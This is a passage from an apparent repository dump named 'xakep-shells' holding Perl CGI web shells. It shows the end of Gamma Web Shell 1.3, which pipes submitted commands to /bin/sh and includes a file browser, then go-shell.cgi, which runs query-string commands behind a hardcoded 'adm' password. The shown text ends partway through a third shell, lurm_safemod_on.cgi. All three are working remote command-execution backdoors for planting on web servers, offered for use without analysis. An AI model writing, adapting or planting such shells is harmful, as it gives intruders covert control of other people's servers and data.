my $VERSION = 'Gamma Web Shell 1.3';
|
||||
|
||||
my $STYLESHEET = <<EOT;
|
||||
body {
|
||||
font-family: Verdana, Helvetica, sans-serif;
|
||||
font-size: 90%;
|
||||
color: #000;
|
||||
background: #FFF;
|
||||
margin: 0px;
|
||||
padding: 0px;
|
||||
}
|
||||
|
||||
h1, h2, h3, h4, h5, h6 {
|
||||
margin: 0.3em;
|
||||
padding: 0px;
|
||||
}
|
||||
|
||||
input, select, textarea, select {
|
||||
font-family: Verdana, Helvetica, sans-serif;
|
||||
font-size: 100%;
|
||||
margin: 1px;
|
||||
padding: 0px 1px;
|
||||
}
|
||||
|
||||
pre, code, tt {
|
||||
font-family: 'Courier New', Courier, monospace;
|
||||
font-size: 100%;
|
||||
}
|
||||
|
||||
form {
|
||||
margin: 0px;
|
||||
padding: 0px;
|
||||
}
|
||||
|
||||
table {
|
||||
font-size: 100%;
|
||||
}
|
||||
|
||||
a {
|
||||
text-decoration: none;
|
||||
color: #000;
|
||||
background: transparent;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.header, .footer {
|
||||
color: #000;
|
||||
background: #CCF;
|
||||
margin: 0px;
|
||||
padding: 0px;
|
||||
text-align: center;
|
||||
border: solid #000;
|
||||
border-width: 1px 0px;
|
||||
}
|
||||
|
||||
.box {
|
||||
border: 1px solid #000;
|
||||
border-collapse: collapse;
|
||||
color: #000;
|
||||
background: #CCF;
|
||||
}
|
||||
|
||||
.box-header, .box-content, .box-text, .box-error, .box-menu {
|
||||
border: 1px solid #000;
|
||||
}
|
||||
|
||||
.box-header, .box-header a {
|
||||
color: #FFF;
|
||||
background: #000;
|
||||
}
|
||||
|
||||
.box-content {
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
.box-text {
|
||||
padding: 3px 10px;
|
||||
font-size: 90%;
|
||||
}
|
||||
|
||||
.box-menu {
|
||||
padding: 3px 10px;
|
||||
}
|
||||
|
||||
.box-error {
|
||||
color: #FFF;
|
||||
background: #F00;
|
||||
font-weight: bold;
|
||||
padding: 3px 25px;
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
.dialog {
|
||||
text-align: left;
|
||||
border-collapse: collapse;
|
||||
}
|
||||
|
||||
.dialog-even {
|
||||
color: #000;
|
||||
background: #CCF;
|
||||
}
|
||||
|
||||
.dialog-odd {
|
||||
color: #000;
|
||||
background: #AAE;
|
||||
}
|
||||
|
||||
.menu {
|
||||
font-weight: normal;
|
||||
}
|
||||
|
||||
.menu-selected {
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.tool {
|
||||
background: transparent;
|
||||
color: #000;
|
||||
border-style: hidden;
|
||||
border-width: 1px;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
.tool:hover {
|
||||
border-style: outset;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
.output {
|
||||
color: #FFF;
|
||||
background: #000;
|
||||
padding: 1em;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.output-text {
|
||||
}
|
||||
|
||||
.output-command {
|
||||
color: #FF7;
|
||||
background: #000;
|
||||
}
|
||||
|
||||
.output-error {
|
||||
color: #FFF;
|
||||
background: #F00;
|
||||
}
|
||||
|
||||
.entries {
|
||||
border: 1px solid #777;
|
||||
border-collapse: collapse;
|
||||
}
|
||||
|
||||
.entries td, .entries th {
|
||||
padding: 2px 10px;
|
||||
}
|
||||
|
||||
.entries th, .entries td {
|
||||
border: 1px solid #777;
|
||||
}
|
||||
|
||||
.entries-even {
|
||||
color: #FFF;
|
||||
background: #444;
|
||||
}
|
||||
|
||||
.entry-dir a {
|
||||
color: #BBF;
|
||||
background: transparent;
|
||||
}
|
||||
|
||||
.entry-exec {
|
||||
color: #BFB;
|
||||
background: transparent;
|
||||
}
|
||||
|
||||
.entry-file {
|
||||
}
|
||||
|
||||
.entry-mine {
|
||||
}
|
||||
|
||||
.entry-alien {
|
||||
color: #FBB;
|
||||
background: transparent;
|
||||
}
|
||||
|
||||
EOT
|
||||
|
||||
$LOGIN_TEMPLATE = <<EOT;
|
||||
<html>
|
||||
<head>
|
||||
<title>Gamma Web Shell</title>
|
||||
<style type="text/css">$STYLESHEET</style>
|
||||
</head>
|
||||
<body>
|
||||
<table width="100%" height="100%">
|
||||
<tr><td class="header"><h2>$VERSION</h2></td></tr>
|
||||
<tr>
|
||||
<td width="100%" height="100%" align="center" valign="center">
|
||||
<form action="WebShell.cgi" method="POST">
|
||||
<table class="box">
|
||||
<tr><th class="box-header">Login</th></tr>
|
||||
[% if error %]
|
||||
<tr><td class="box-error">Invalid password!</td></tr>
|
||||
[% end %]
|
||||
<tr>
|
||||
<td class="box-content">
|
||||
<table class="dialog" width="100%">
|
||||
<tr>
|
||||
<td>Password:</td>
|
||||
<td><input name="password" type="password"></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td class="box-content">
|
||||
<input class="tool" type="submit" value="OK">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
</td>
|
||||
</tr>
|
||||
<tr><td class="footer"><h5>Copyright © 2003 <a href="http://www.gammacenter.com/">Gamma Group</a></h5></td></tr>
|
||||
</table>
|
||||
</body>
|
||||
</html>
|
||||
EOT
|
||||
|
||||
$INPUT_TEMPLATE = <<EOT;
|
||||
<html>
|
||||
<head>
|
||||
<title>Gamma Web Shell</title>
|
||||
<style type="text/css">$STYLESHEET</style>
|
||||
</head>
|
||||
<body>
|
||||
<table width="100%" height="100%">
|
||||
<tr><td class="header"><h2>$VERSION</h2></td></tr>
|
||||
<tr>
|
||||
<td width="100%" height="100%" align="center" valign="center">
|
||||
<iframe name="output" src="WebShell.cgi?action=execute" width="80%" height="80%"></iframe>
|
||||
<br><br>
|
||||
<script type="text/javascript">
|
||||
function submit_execute() {
|
||||
var entry = document.forms.execute.elements['command'];
|
||||
if (entry.value.length > 0) {
|
||||
entry.select();
|
||||
entry.focus();
|
||||
document.forms.execute.elements['action'].value = 'execute';
|
||||
return true;
|
||||
}
|
||||
else {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
function submit_browse() {
|
||||
document.forms.execute.elements['action'].value = 'browse';
|
||||
}
|
||||
</script>
|
||||
<form name="execute" action="WebShell.cgi" method="POST" target="output">
|
||||
<input name="action" type="hidden" value="execute">
|
||||
<table class="box">
|
||||
<tr>
|
||||
<td class="box-content">
|
||||
<table class="dialog" width="100%">
|
||||
<tr>
|
||||
<th>Command:</th>
|
||||
<td><input name="command" type="text" size="50"></td>
|
||||
<td><input class="tool" type="submit" value="Execute" onClick="return submit_execute()"></td>
|
||||
<td><input class="tool" type="submit" value="Browse" onClick="return submit_browse()"></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
</td>
|
||||
</tr>
|
||||
<tr><td class="footer"><h5>Copyright © 2003 <a href="http://www.gammacenter.com/">Gamma Group</a></h5></td></tr>
|
||||
</table>
|
||||
</body>
|
||||
</html>
|
||||
EOT
|
||||
|
||||
$EXECUTE_TEMPLATE = <<EOT;
|
||||
<html>
|
||||
<head>
|
||||
<title>Gamma Web Shell</title>
|
||||
<style type="text/css">$STYLESHEET</style>
|
||||
</head>
|
||||
<body class="output">
|
||||
[% if old_line %]
|
||||
<pre class="output-command">[% old_line as html %]</pre>
|
||||
[% end %]
|
||||
[% if output %]
|
||||
<pre class="output-text">[% output as html %]</pre>
|
||||
[% end %]
|
||||
[% if error %]
|
||||
<pre class="output-error">[% error as html %]</pre>
|
||||
[% end %]
|
||||
[% if new_line %]
|
||||
<pre class="output-command">[% new_line as html %]</pre>
|
||||
[% end %]
|
||||
</body>
|
||||
</html>
|
||||
EOT
|
||||
|
||||
$BROWSE_TEMPLATE = <<EOT;
|
||||
<html>
|
||||
<head>
|
||||
<title>Gamma Web Shell</title>
|
||||
<style type="text/css">$STYLESHEET</style>
|
||||
</head>
|
||||
<body class="output">
|
||||
[% if error %]
|
||||
<p class="output-error">[% error as html %]</p>
|
||||
[% end %]
|
||||
<table class="entries" width="100%">
|
||||
<tr class="entries-even" align="left">
|
||||
<th colspan="6">
|
||||
[% for entry in directory %]<code class="entry-dir"><a href="WebShell.cgi?action=browse&path=[% entry.path as url %]">[% entry.name as html %]/</a></code>[% end %]
|
||||
</th>
|
||||
</tr>
|
||||
<tr class="entries-odd" align="left">
|
||||
<th width="100%"><small>Name</small></th>
|
||||
<th><small>Size</small></th>
|
||||
<th><small>Time</small></th>
|
||||
<th><small>Owner</small></th>
|
||||
<th><small>Group</small></th>
|
||||
<th><small>Mode</small></th>
|
||||
</tr>
|
||||
[% for entry in entries %]
|
||||
<tr class="entries-[% if loop.entry.even %]even[% else %]odd[% end %]">
|
||||
<td width="100%">
|
||||
[% if entry.type_file %]
|
||||
[% if entry.type_exec %]
|
||||
<code class="entry-exec">[% entry.name as html %]</code>
|
||||
[% else %]
|
||||
<code class="entry-file">[% entry.name as html %]</code>
|
||||
[% end %]
|
||||
[% elif entry.type_dir %]
|
||||
<code class="entry-dir"><a href="WebShell.cgi?action=browse&path=[% entry.name as url %]">[% entry.name as html %]/</a></code>
|
||||
[% else %]
|
||||
<code class="entry-other">[% entry.name as html %]</code>
|
||||
[% end %]
|
||||
</td>
|
||||
<td align="right">
|
||||
[% if entry.type_file %]
|
||||
<code class="entry-text">[% entry.size as html %]</code></td>
|
||||
[% else %]
|
||||
|
||||
[% end %]
|
||||
</td>
|
||||
<td><code class="entry-text">[% entry.time as nbsp %]</code></td>
|
||||
<td><code class="entry-[% if entry.all_rights %]mine[% else %]alien[% end %]">[% entry.user as html %]</code></td>
|
||||
<td><code class="entry-[% if entry.all_rights %]mine[% else %]alien[% end %]">[% entry.group as html %]</code></td>
|
||||
<td><code class="entry-text">[% entry.mode as html %]</code></td>
|
||||
</tr>
|
||||
[% end %]
|
||||
</table>
|
||||
</body>
|
||||
</html>
|
||||
EOT
|
||||
|
||||
|
||||
###############################################################################
|
||||
|
||||
package WebShell::MiniXIT;
|
||||
|
||||
sub new {
|
||||
my ($class) = @_;
|
||||
return bless {}, $class;
|
||||
}
|
||||
|
||||
sub substitute {
|
||||
my ($self, $input, %keywords) = @_;
|
||||
my $statements = $self->parse($input);
|
||||
my $operation = $self->compile($statements);
|
||||
my $output = $self->evaluate($operation, \%keywords);
|
||||
return $output;
|
||||
}
|
||||
|
||||
sub parse {
|
||||
my ($self, $input) = @_;
|
||||
my $statements = [];
|
||||
my $start = 0;
|
||||
while ($input =~ /(\[%\s*(.*?)\s*%\])/g) {
|
||||
my $match_end = pos($input);
|
||||
my $match_start = $match_end - length($1);
|
||||
if ($start < $match_start) {
|
||||
my $text = substr($input, $start, $match_start-$start);
|
||||
push @$statements, { id => 'text', text => $text };
|
||||
}
|
||||
push @$statements, $self->parse_command($2);
|
||||
$start = $match_end;
|
||||
}
|
||||
if ($start < length($input)) {
|
||||
my $text = substr($input, $start);
|
||||
push @$statements, { id => 'text', text => $text };
|
||||
}
|
||||
return $statements;
|
||||
}
|
||||
|
||||
sub parse_command {
|
||||
my ($self, $command) = @_;
|
||||
if ($command =~ /^if\s+(\w+(\.\w+)*)$/) {
|
||||
return { id => 'if', test => $1, };
|
||||
}
|
||||
elsif ($command =~ /^elif\s+(\w+(\.\w+)*)$/) {
|
||||
return { id => 'elif', test => $1 };
|
||||
}
|
||||
elsif ($command =~ /^else$/) {
|
||||
return { id => 'else' };
|
||||
}
|
||||
elsif ($command =~ /^for\s+(\w+)\s+in\s+(\w+(\.\w+)*)$/) {
|
||||
return { id => 'for', name => $1, list => $2 };
|
||||
}
|
||||
elsif ($command =~ /^end$/) {
|
||||
return { id => 'end' };
|
||||
}
|
||||
elsif ($command =~ /^(\w+(\.\w+)*)(\s+as\s+(\w+))$/) {
|
||||
return { id => 'print', variable => $1, format => $4 };
|
||||
}
|
||||
else {
|
||||
die "invalid command: '$command'";
|
||||
}
|
||||
}
|
||||
|
||||
sub compile {
|
||||
my ($self, $statements) = @_;
|
||||
my $operation = $self->compile_sequence($statements);
|
||||
if (scalar(@$statements)) {
|
||||
my $statement = shift(@$statements);
|
||||
my $id = $statements->{id};
|
||||
die "unexpected statement: '$id'";
|
||||
}
|
||||
return $operation;
|
||||
}
|
||||
|
||||
sub compile_sequence {
|
||||
my ($self, $statements) = @_;
|
||||
my $operations = [];
|
||||
while (scalar(@$statements) > 0) {
|
||||
my $id = $statements->[0]->{id};
|
||||
if ($id eq 'if') {
|
||||
push @$operations, $self->compile_condition($statements);
|
||||
}
|
||||
elsif ($id eq 'for') {
|
||||
push @$operations, $self->compile_loop($statements);
|
||||
}
|
||||
elsif ($id eq 'print' or $id eq 'text') {
|
||||
my $statement = shift @$statements;
|
||||
push @$operations, $statement;
|
||||
}
|
||||
else {
|
||||
last;
|
||||
}
|
||||
}
|
||||
return { id => 'sequence', operations => $operations };
|
||||
}
|
||||
|
||||
sub compile_condition {
|
||||
my ($self, $statements) = @_;
|
||||
my $conditions = [];
|
||||
my $statement = shift @$statements;
|
||||
my $id = defined $statement ? $statement->{id} : 'none';
|
||||
while ($id eq 'if' or $id eq 'elif' or $id eq 'else') {
|
||||
my $test = $id ne 'else' ? $statement->{test} : undef;
|
||||
my $operation = $self->compile_sequence($statements);
|
||||
push @$conditions, { test => $test, operation => $operation };
|
||||
$statement = shift @$statements;
|
||||
$id = defined $statement ? $statement->{id} : 'none';
|
||||
}
|
||||
die "'end' expected, but '$id' found" unless $id eq 'end';
|
||||
return { id => 'condition', conditions => $conditions };
|
||||
}
|
||||
|
||||
sub compile_loop {
|
||||
my ($self, $statements) = @_;
|
||||
my $statement = shift @$statements;
|
||||
my $name = $statement->{name};
|
||||
my $list = $statement->{list};
|
||||
my $operation = $self->compile_sequence($statements);
|
||||
$statement = shift @$statements;
|
||||
my $id = defined $statement ? $statement->{id} : 'none';
|
||||
die "'end' expected, but '$id' found" unless $id eq 'end';
|
||||
return { id => 'loop',
|
||||
name => $name, list => $list, operation => $operation };
|
||||
}
|
||||
|
||||
sub evaluate {
|
||||
my ($self, $operation, $keywords) = @_;
|
||||
$keywords->{loop} = {};
|
||||
my $chunks = $self->evaluate_operation($operation, $keywords);
|
||||
return join('', @$chunks);
|
||||
}
|
||||
|
||||
sub evaluate_operation {
|
||||
my ($self, $operation, $keywords) = @_;
|
||||
if ($operation->{id} eq 'condition') {
|
||||
return $self->evaluate_condition($operation->{conditions}, $keywords);
|
||||
}
|
||||
elsif ($operation->{id} eq 'loop') {
|
||||
return $self->evaluate_loop($operation->{name}, $operation->{list},
|
||||
$operation->{operation}, $keywords);
|
||||
}
|
||||
elsif ($operation->{id} eq 'print') {
|
||||
return $self->evaluate_print($operation->{variable},
|
||||
$operation->{format}, $keywords);
|
||||
}
|
||||
elsif ($operation->{id} eq 'sequence') {
|
||||
my $chunks = [];
|
||||
push @$chunks, @{$self->evaluate_operation($_, $keywords)}
|
||||
for (@{$operation->{operations}});
|
||||
return $chunks;
|
||||
}
|
||||
elsif ($operation->{id} eq 'text') {
|
||||
return [$operation->{text}];
|
||||
}
|
||||
}
|
||||
|
||||
sub evaluate_condition {
|
||||
my ($self, $conditions, $keywords) = @_;
|
||||
for my $condition (@$conditions) {
|
||||
my $test = $condition->{test};
|
||||
my $value = defined $test ?
|
||||
$self->evaluate_variable($test, $keywords) : 1;
|
||||
return $self->evaluate_operation($condition->{operation}, $keywords)
|
||||
if $value;
|
||||
}
|
||||
return [];
|
||||
}
|
||||
|
||||
sub evaluate_loop {
|
||||
my ($self, $name, $list, $operation, $keywords) = @_;
|
||||
my $values = $self->evaluate_variable($list, $keywords);
|
||||
my $length = scalar(@$values);
|
||||
my $index = 0;
|
||||
my $chunks = [];
|
||||
for my $value (@$values) {
|
||||
$keywords->{$name} = $value;
|
||||
$keywords->{loop}->{$name} = {
|
||||
index => $index, number => $index+1,
|
||||
first => $index == 0, last => $index == $length-1,
|
||||
odd => $index % 2 == 1, even => $index % 2 == 0,
|
||||
};
|
||||
push @$chunks, @{$self->evaluate_operation($operation, $keywords)};
|
||||
$index++;
|
||||
}
|
||||
delete $keywords->{$name};
|
||||
delete $keywords->{loop}->{$name};
|
||||
return $chunks;
|
||||
}
|
||||
|
||||
sub evaluate_print {
|
||||
my ($self, $variable, $format, $keywords) = @_;
|
||||
my $value = $self->evaluate_variable($variable, $keywords);
|
||||
if ($format eq 'html') {
|
||||
for ($value) { s/&/&/g; s/</</g; s/>/>/g; s/"/"/g; }
|
||||
}
|
||||
elsif ($format eq 'nbsp') {
|
||||
for ($value) {
|
||||
s/&/&/g; s/</</g; s/>/>/g; s/"/"/g; s/ / /g;
|
||||
}
|
||||
}
|
||||
elsif ($format eq 'url') {
|
||||
$value =~ s/(\W)/sprintf('%%%02X', ord($1))/eg;
|
||||
}
|
||||
elsif ($format ne '') {
|
||||
|
||||
die "unknown format: '$format'";
|
||||
}
|
||||
return [$value];
|
||||
}
|
||||
|
||||
sub evaluate_variable {
|
||||
my ($self, $variable, $keywords) = @_;
|
||||
my $value = $keywords;
|
||||
for my $name (split(/\./, $variable)) {
|
||||
$value = $value->{$name};
|
||||
}
|
||||
return $value;
|
||||
}
|
||||
|
||||
###############################################################################
|
||||
|
||||
package WebShell::Script;
|
||||
|
||||
use CGI;
|
||||
use CGI::Carp qw(fatalsToBrowser);
|
||||
use IPC::Open3;
|
||||
use Cwd;
|
||||
use POSIX;
|
||||
|
||||
sub new {
|
||||
my ($class) = @_;
|
||||
my $self = bless { }, $class;
|
||||
$self->initialize();
|
||||
return $self;
|
||||
}
|
||||
|
||||
sub query {
|
||||
my ($self, @names) = @_;
|
||||
my @values = ();
|
||||
for my $name (@names) {
|
||||
my $value = $self->{cgi}->param($name);
|
||||
for ($value) { s/^\s+//; s/\s+$//; }
|
||||
push @values, $value;
|
||||
}
|
||||
return wantarray ? @values : "@values";
|
||||
}
|
||||
|
||||
sub initialize {
|
||||
my ($self) = @_;
|
||||
$self->{cgi} = new CGI;
|
||||
$self->{cwd} = $self->{cgi}->cookie(-name => 'WebShell-cwd');
|
||||
$self->{cwd} = cwd unless defined $self->{cwd};
|
||||
$self->{cwd} = cwd if $WebShell::Configuration::restricted_mode;
|
||||
$self->{login} = 0;
|
||||
my $login = $self->{cgi}->cookie(-name => 'WebShell-login');
|
||||
my $password = $self->query('password');
|
||||
$self->{login} = 1
|
||||
if crypt($WebShell::Configuration::password, $login."XX") eq $login;
|
||||
$self->{login} = 1 if $password eq $WebShell::Configuration::password;
|
||||
}
|
||||
|
||||
sub run {
|
||||
my ($self) = @_;
|
||||
return $self->login_action unless $self->{login};
|
||||
my $action = $self->query('action');
|
||||
$action = 'default' unless $action =~ /^\w+$/;
|
||||
$action = $self->can($action . '_action');
|
||||
$action = $self->can('default_action') unless defined $action;
|
||||
$self->$action();
|
||||
}
|
||||
|
||||
sub default_action {
|
||||
my ($self) = @_;
|
||||
$self->publish('INPUT');
|
||||
}
|
||||
|
||||
sub login_action {
|
||||
my ($self) = @_;
|
||||
$self->publish('LOGIN', error => ($self->query('password') ne ''));
|
||||
}
|
||||
|
||||
sub command {
|
||||
my ($self, $command) = @_;
|
||||
chdir($self->{cwd});
|
||||
my $pid = open3(\*WRTH, \*RDH, \*ERRH, "/bin/sh");
|
||||
print WRTH "$command\n";
|
||||
close(WRTH);
|
||||
my $output = do { local $/; <RDH> };
|
||||
my $error = do { local $/; <ERRH> };
|
||||
waitpid($pid, 0);
|
||||
return ($output, $error);
|
||||
}
|
||||
|
||||
sub forbidden_command {
|
||||
my ($self, $command) = @_;
|
||||
my $error = "This command is not available in the restricted mode.\n";
|
||||
$error .= "You may only use the following commands:\n";
|
||||
for my $ok_command (@$WebShell::Configuration::ok_commands) {
|
||||
$error .= " $ok_command\n";
|
||||
}
|
||||
return ('', $error);
|
||||
}
|
||||
|
||||
sub cd_command {
|
||||
my ($self, $command) = @_;
|
||||
my $error;
|
||||
my $directory = $1 if $command =~ /^cd\s+(\S+)$/;
|
||||
warn "cwd: '$self->{cwd}'\n";
|
||||
warn "command: '$command'\n";
|
||||
warn "directory: '$directory'\n";
|
||||
if ($directory ne '') {
|
||||
$error = $! unless chdir($self->{cwd});
|
||||
$error = $! unless chdir($directory);
|
||||
}
|
||||
$self->{cwd} = cwd;
|
||||
return ('', $error);
|
||||
}
|
||||
|
||||
sub execute_action {
|
||||
my ($self) = @_;
|
||||
my $command = $self->query('command');
|
||||
my $user = getpwuid($>);
|
||||
my $old_line = "[$user: $self->{cwd}]\$ $command";
|
||||
my ($output, $error);
|
||||
if ($command ne "") {
|
||||
my $allow = not $WebShell::Configuration::restricted_mode;
|
||||
for my $ok_command (@$WebShell::Configuration::ok_commands) {
|
||||
$allow = 1 if $command eq $ok_command;
|
||||
}
|
||||
if ($allow) {
|
||||
$command =~ /^(\w+)/;
|
||||
if (my $method = $self->can("${1}_command")) {
|
||||
($output, $error) = $self->$method($command);
|
||||
}
|
||||
else {
|
||||
($output, $error) = $self->command($command);
|
||||
}
|
||||
|
||||
}
|
||||
else {
|
||||
($output, $error) = $self->forbidden_command($command);
|
||||
}
|
||||
}
|
||||
my $new_line = "[$user: $self->{cwd}]\$ " unless $command eq "";
|
||||
$self->publish('EXECUTE',
|
||||
old_line => $old_line, new_line => $new_line,
|
||||
output => $output, error => $error);
|
||||
}
|
||||
|
||||
sub browse_action {
|
||||
my ($self) = @_;
|
||||
my $error = "";
|
||||
my $path = $self->query('path');
|
||||
if ($WebShell::Configuration::restricted_mode and $path ne '') {
|
||||
$error = "You cannot browse directories in the restricted mode.";
|
||||
$path = "";
|
||||
}
|
||||
$error = $! unless chdir($self->{cwd});
|
||||
if ($path ne '') {
|
||||
$error = $! unless chdir($path);
|
||||
}
|
||||
$self->{cwd} = cwd;
|
||||
opendir(DIR, '.');
|
||||
my @dir = readdir(DIR);
|
||||
closedir(DIR);
|
||||
my @entries = ();
|
||||
for my $name (@dir) {
|
||||
my ($dev, $ino, $mode, $nlink, $uid, $gid, $rdev, $size,
|
||||
$atime, $mtime, $ctime, $blksize, $blocks) = stat($name);
|
||||
my $modestr = S_ISDIR($mode) ? 'd' : '-';
|
||||
$modestr .= ($mode & S_IRUSR) ? 'r' : '-';
|
||||
$modestr .= ($mode & S_IWUSR) ? 'w' : '-';
|
||||
$modestr .= ($mode & S_ISUID) ? 's' : ($mode & S_IXUSR) ? 'x' : '-';
|
||||
$modestr .= ($mode & S_IRGRP) ? 'r' : '-';
|
||||
$modestr .= ($mode & S_IWGRP) ? 'w' : '-';
|
||||
$modestr .= ($mode & S_ISGID) ? 's' : ($mode & S_IXGRP) ? 'x' : '-';
|
||||
$modestr .= ($mode & S_IROTH) ? 'r' : '-';
|
||||
$modestr .= ($mode & S_IWOTH) ? 'w' : '-';
|
||||
$modestr .= ($mode & S_IXOTH) ? 'x' : '-';
|
||||
my $userstr = getpwuid($uid);
|
||||
my $groupstr = getgrgid($gid);
|
||||
my $sizestr = ($size < 1024) ? $size :
|
||||
($size < 1024*1024) ? sprintf("%.1fk", $size/1024) :
|
||||
sprintf("%.1fM", $size/(1024*1024));
|
||||
my $timestr = strftime('%H:%M %b %e %Y', localtime($mtime));
|
||||
push @entries, {
|
||||
name => $name,
|
||||
type_file => S_ISREG($mode),
|
||||
type_dir => S_ISDIR($mode),
|
||||
type_exec => ($mode & S_IXUSR),
|
||||
mode => $modestr,
|
||||
user => $userstr,
|
||||
group => $groupstr,
|
||||
order => (S_ISDIR($mode) ? 0 : 1) . $name,
|
||||
all_rights => (-w $name),
|
||||
size => $sizestr,
|
||||
time => $timestr,
|
||||
};
|
||||
}
|
||||
@entries = sort { $a->{order} cmp $b->{order} } @entries;
|
||||
my @directory = ();
|
||||
my $path = '';
|
||||
for my $name (split m|/|, $self->{cwd}) {
|
||||
$path .= "$name/";
|
||||
push @directory, {
|
||||
name => $name,
|
||||
path => $path,
|
||||
};
|
||||
}
|
||||
@directory = ({ name => '', path => '/'}) unless @directory;
|
||||
$self->publish('BROWSE', entries => \@entries, directory => \@directory,
|
||||
error => $error);
|
||||
}
|
||||
|
||||
sub publish {
|
||||
my ($self, $template, %keywords) = @_;
|
||||
$template = eval '$WebShell::Templates::' . $template . '_TEMPLATE';
|
||||
my $xit = new WebShell::MiniXIT;
|
||||
my $text = $xit->substitute($template, %keywords);
|
||||
$self->{cgi}->url =~ m{^http://([^/]*)(.*)/[^/]*$};
|
||||
my $domain = $1;
|
||||
my $path = $2;
|
||||
my $cwd_cookie = $self->{cgi}->cookie(
|
||||
-name => 'WebShell-cwd',
|
||||
-value => $self->{cwd},
|
||||
-domain => $domain,
|
||||
-path => $path,
|
||||
);
|
||||
my $login = "";
|
||||
if ($self->{login}) {
|
||||
my $salt = join '',
|
||||
('.', '/', 0..9, 'A'..'Z', 'a'..'z')[rand 64, rand 64];
|
||||
$login = crypt($WebShell::Configuration::password, $salt);
|
||||
}
|
||||
my $login_cookie = $self->{cgi}->cookie(
|
||||
-name => 'WebShell-login',
|
||||
-value => $login,
|
||||
-domain => $domain,
|
||||
-path => $path,
|
||||
);
|
||||
print $self->{cgi}->header(-cookie => [$cwd_cookie, $login_cookie]);
|
||||
print $text;
|
||||
}
|
||||
|
||||
###############################################################################
|
||||
|
||||
package WebShell;
|
||||
|
||||
my $script = new WebShell::Script;
|
||||
$script->run;
|
||||
|
||||
###############################################################################
|
||||
###############################################################################
|
87
xakep-shells/CGI/go-shell.cgi.txt
Normal file
87
xakep-shells/CGI/go-shell.cgi.txt
Normal file
|
@ -0,0 +1,87 @@
|
|||
#!/usr/bin/perl
|
||||
|
||||
#change this password; for power security - delete this file =)
|
||||
$pwd='adm';
|
||||
|
||||
print "Content-type: text/html\n\n";
|
||||
&read_param();
|
||||
if (!defined$param{dir}){$param{dir}="/"};
|
||||
if (!defined$param{cmd}){$param{cmd}="ls -la"};
|
||||
if (!defined$param{pwd}){$param{pwd}='ter'};
|
||||
|
||||
print << "[kalabanga]";
|
||||
<head>
|
||||
<title>GO.cgi</title>
|
||||
<style>
|
||||
BODY, TD { font-family: Tahoma; font-size: 12px; }
|
||||
INPUT.TEXT {
|
||||
font-family : Arial;
|
||||
font-size : 8pt;
|
||||
color : Black;
|
||||
width : 100%;
|
||||
background-color : #F1F1F1;
|
||||
border-style : solid;
|
||||
border-width : 0px;
|
||||
border-color : Silver;
|
||||
}
|
||||
INPUT.BUTTON {
|
||||
font-family : Arial;
|
||||
font-size : 8pt;
|
||||
width : 100px;
|
||||
border-width : 1px;
|
||||
color : Black;
|
||||
background-color : D1D1D1;
|
||||
border-color : silver;
|
||||
border-style : solid;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body bgcolor=#B9B9B9>
|
||||
Current request is:
|
||||
<table width=100% bgcolor=D9D9D9><tr><td>
|
||||
[kalabanga]
|
||||
|
||||
print "cd $param{dir}&&$param{cmd}";
|
||||
|
||||
print << "[kalabanga]";
|
||||
</td></tr></table>
|
||||
Answer for current request is:
|
||||
<table width=100% bgcolor=D9D9D9><tr><td><pre>
|
||||
[kalabanga]
|
||||
|
||||
if ($param{pwd} ne $pwd){print "user invalid, please replace user";}
|
||||
else {
|
||||
open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
|
||||
while ($line=<FILEHANDLE>){print "$line";};
|
||||
close (FILEHANDLE);
|
||||
};
|
||||
|
||||
print << "[kalabanga]";
|
||||
</pre></td></tr></table>
|
||||
<form action=go.cgi>
|
||||
Password:
|
||||
<input type=text class="TEXT" name=pwd value=$param{pwd}>
|
||||
Dir for next request:
|
||||
<input type=text class="TEXT" name=dir value=$param{dir}>
|
||||
next request:
|
||||
<input type=text class="TEXT" name=cmd value=$param{cmd}>
|
||||
<input type=submit class="button" value="Submit">
|
||||
<input type=reset class="button" value="Reset">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
[kalabanga]
|
||||
|
||||
sub read_param {
|
||||
$buffer = "$ENV{'QUERY_STRING'}";
|
||||
@pairs = split(/&/, $buffer);
|
||||
foreach $pair (@pairs)
|
||||
{
|
||||
($name, $value) = split(/=/, $pair);
|
||||
$name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
|
||||
$value =~ s/\+/ /g;
|
||||
$value =~ s/%20/ /g;
|
||||
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
|
||||
$param{$name} = $value;
|
||||
}
|
||||
}
|
94
xakep-shells/CGI/lurm_safemod_on.cgi.txt
Normal file
94
xakep-shells/CGI/lurm_safemod_on.cgi.txt
Normal file
|
@ -0,0 +1,94 @@
|
|||
#!/usr/bin/perl
|
||||
############################################################
|
||||
## Network security team ##
|
||||
############################################################
|
||||
##Coder: Ins ##
|
||||
############################################################
|
||||
##Ob dannom scripte: Eto prostoj shell napisannyj na perle##
|
||||
############################################################
|
||||
|
||||
#V celjah nesankcionirovannogo dostupa smeni etot parol`"
|
||||
#$pwd='';
|
||||
|
||||
print "Content-type: text/html\n\n";
|
||||
&read_param();
|
||||
if (!defined$param{dir}){$param{dir}="/"};
|
||||
if (!defined$param{cmd}){$param{cmd}="ls -la"};
|
||||
##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##
|
||||
|
||||
print << "[ins1]";
|
||||
<head>
|
||||
<title>::Network Security Team::</title>
|
||||
<font size=3 face=verdana><b>Network security team :: CGI Shell</b>
|
||||
<font size=-2 face=verdana><br><br>
|
||||
<style>
|
||||
BODY, TD { font-family: Tahoma; font-size: 12px; }
|
||||
INPUT.TEXT {
|
||||
font-family : Arial;
|
||||
font-size : 8pt;
|
||||
color : Black;
|
||||
width : 100%;
|
||||
